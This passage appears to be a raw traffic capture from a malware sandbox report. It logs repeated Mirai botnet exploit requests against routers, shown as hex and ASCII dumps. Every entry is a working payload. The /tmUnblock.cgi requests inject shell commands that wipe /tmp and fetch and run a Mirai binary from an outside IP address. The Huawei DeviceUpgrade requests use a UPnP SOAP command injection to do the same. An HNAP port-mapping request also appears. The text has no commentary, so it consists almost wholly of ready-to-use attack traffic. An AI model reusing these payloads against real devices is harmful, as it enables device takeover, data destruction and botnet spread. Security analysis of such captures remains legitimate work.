50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
